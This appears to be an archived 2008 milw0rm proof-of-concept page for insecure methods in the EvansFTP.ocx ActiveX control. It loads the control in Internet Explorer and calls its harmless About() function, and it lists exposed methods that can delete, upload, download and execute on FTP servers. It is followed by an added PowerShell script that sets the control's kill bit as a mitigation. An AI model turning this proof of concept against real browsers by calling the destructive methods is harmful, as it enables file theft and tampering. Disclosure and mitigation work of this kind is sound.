<HTML>
<!--
- EvansFTP (EvansFTP.ocx) Remote Insecure Methods Exploit -

Author: t0pP8uZz
Homepage: h4ck-y0u.org / milw0rm.com

Description: ActiveX Remote Insecure Report
Tested on: Microsoft Windows XP Pro (SP2), Internet Explorer 7, fully patched
ActiveX: http://www.evansprogramming.com/evansftp.asp

The following material is for educational purposes only - I will not be held responsible for any illegal actions.

Internet Explorer can initialise this ActiveX control and take advantage of its functions.
Included in this exploit (POC) is a piece of JavaScript code launching the ActiveX control
and executing one of its functions, the function being About(). All this will do is launch
a friendly, harmless dialog box, therefore being the perfect POC.

- EvansFTP.ocx -

About              Displays the Evans FTP control About dialog.
CancelTransfer     Cancels in-progress file and data connection transfers.
Connect            Opens a connection to the remote FTP server and starts a new session thread (logs in).
DeleteFile         Deletes file(s) from a remote server's directory.
Disconnect         Disconnects an FTP session (logs out).
Execute            Executes a remote FTP server command.
GetDirectory       Returns a list of directory information from the remote server.
GetFile            Transfers files from a remote FTP server to a local PC.
MakePath           Creates a path on the remote server. MakePath can create multiple nested subdirectories with a single command.
MkDir              Creates a folder on the remote FTP server.
Ping               Tests if a remote server is responding.
PutFile            Transfers files from the local PC to a remote FTP server.
RenameFile         Renames a file on the remote FTP server.
RmDir              Removes a directory from the remote FTP server.
WriteToConnection  This method writes to an open data connection such as would be required to execute an FTP command like APPE.

Peace.
-->
<OBJECT ID="test" CLASSID="CLSID:DA3C77F4-8701-11D4-908B-00010268221D">Could Not Load ActiveX Control.</OBJECT>
<script language="javascript">
/* - EvansFTP (EvansFTP.ocx) Remote Insecure Methods Exploit - */
/* Javascript Code By t0pP8uZz */
/* Internet Explorer exposes the OBJECT element above by its ID; About() only opens the control's About dialog. */
test.About();
</script>
</HTML>
# milw0rm.com [2008-05-09]
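The practical mitigation for a control that Internet Explorer will instantiate from any web page is to set its ActiveX "kill bit" so the browser refuses to load it, without uninstalling the software that ships the .ocx. The script below is an added example and is not part of the original milw0rm post or of the EvansFTP product; it uses the CLSID from the OBJECT tag above and the documented Internet Explorer "ActiveX Compatibility" registry mechanism (a `Compatibility Flags` DWORD with bit 0x400 set). The function names are my own.

```powershell
# Added example (not part of the original post): report and, optionally, set the
# Internet Explorer kill bit for EvansFTP.ocx. The CLSID comes from the OBJECT tag
# in the page above; the registry path and the 0x400 flag are Microsoft's
# documented ActiveX Compatibility mechanism. Setting the bit requires an
# elevated (Administrator) PowerShell session.

$ClsId = '{DA3C77F4-8701-11D4-908B-00010268221D}'
$KillBitFlag = 0x400

function Get-ActiveXKillBitPath {
    param([Parameter(Mandatory)][string]$ClsId)
    # 32-bit IE on 64-bit Windows reads the Wow6432Node view, so both keys are
    # returned there; on 32-bit Windows only the native key applies.
    $paths = @("HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\$ClsId")
    if ([Environment]::Is64BitOperatingSystem) {
        $paths += "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\$ClsId"
    }
    $paths
}

function Test-ActiveXKillBit {
    param([Parameter(Mandatory)][string]$ClsId)
    foreach ($path in Get-ActiveXKillBitPath -ClsId $ClsId) {
        $flags = $null
        if (Test-Path $path) {
            $flags = (Get-ItemProperty -Path $path -Name 'Compatibility Flags' `
                        -ErrorAction SilentlyContinue).'Compatibility Flags'
        }
        # The control is blocked only when the 0x400 bit is present in the flags.
        $set = ($null -ne $flags) -and (($flags -band $KillBitFlag) -ne 0)
        [pscustomobject]@{ Path = $path; Flags = $flags; KillBitSet = $set }
    }
}

function Set-ActiveXKillBit {
    [CmdletBinding(SupportsShouldProcess)]
    param([Parameter(Mandatory)][string]$ClsId)
    foreach ($path in Get-ActiveXKillBitPath -ClsId $ClsId) {
        if ($PSCmdlet.ShouldProcess($path, 'Set Compatibility Flags kill bit (0x400)')) {
            if (-not (Test-Path $path)) { New-Item -Path $path -Force | Out-Null }
            # Preserve any flags already present and OR in the kill bit.
            $existing = (Get-ItemProperty -Path $path -Name 'Compatibility Flags' `
                           -ErrorAction SilentlyContinue).'Compatibility Flags'
            $newFlags = [int]($existing -bor $KillBitFlag)
            Set-ItemProperty -Path $path -Name 'Compatibility Flags' -Value $newFlags -Type DWord
        }
    }
}

# Usage: show the current state, then preview the change; drop -WhatIf to apply it.
Test-ActiveXKillBit -ClsId $ClsId | Format-Table -AutoSize
Set-ActiveXKillBit -ClsId $ClsId -WhatIf
```

The kill bit only stops Internet Explorer (and other hosts that honour the ActiveX Compatibility list) from instantiating the control; the .ocx stays registered and any desktop application that uses it keeps working. Re-running `Test-ActiveXKillBit` after applying the change, and loading the POC page above to confirm the "Could Not Load ActiveX Control." fallback text appears, verifies that the mitigation took effect.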